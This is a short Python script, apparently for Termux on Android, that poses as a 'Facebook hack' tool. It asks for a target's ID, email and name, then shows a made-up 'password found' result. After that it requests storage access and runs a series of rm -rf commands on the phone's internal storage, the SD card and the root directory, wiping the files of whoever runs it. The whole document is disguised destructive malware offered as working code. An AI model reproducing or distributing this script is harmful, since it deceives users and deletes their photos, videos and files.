import os
import time

print("""\033[92m
__________________________________________
|  __  ___  ___  ___  __   __   __. _  _   |
| |__ |___||    |___ |__| |  | |  | |_/    |
| |   |   ||___ |___ |__| |__| |__| | \_   |
|       ___   ___ _  _     _.     ___      |
| |__| |___| |    |_/   | | \  | | |__.    |
| |  | |   | |___ | \_  | |  \_| |___|'    |    
|__________________________________________| """)                                       
	                                                                
print("\033[93mCreated By:\033[96m ҽմցҽղҽ օƒƒϲíɑӀ \033[92m[Cyber Alliance]")
print("\033[95m------------------------------------------")
print()
input("\033[92m[\033[0m~\033[92m]\033[0m ID \033[91m |\033[92m\033[0m EMAIL \033[91m |\033[92m\033[0m HP \033[92m :")
time.sleep(2)
input("\033[92m[\033[0m~\033[92m]\033[0m Target Name \033[92m:")
time.sleep(2)
print()
print()
print()
input("\033[9m[\033[94m=\033[92m] \033[94mStart  \033[0m>\033[95m ")
time.sleep(1)
print("\033[92m[+]\033[0m PASSWORD FOUND")
time.sleep(2)
input("\033[92m[+]\033[0m Username :\033[95m ")
time.sleep(1)
print("\033[91m[*]Please wait 15 seconds...")
time.sleep(15)
print("\033[92m[+]\033[0m Password :\033[95mTamayoFamily563")
print("\033[92m[+]\033[0m Status :\033[92m SUCCESS")
print("\033[92m[=]\033[0m Program Finish")
time.sleep(2)
print()
print("\033[0m {Announcement!!! Go To Your Video and Files}==>")

os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /*')
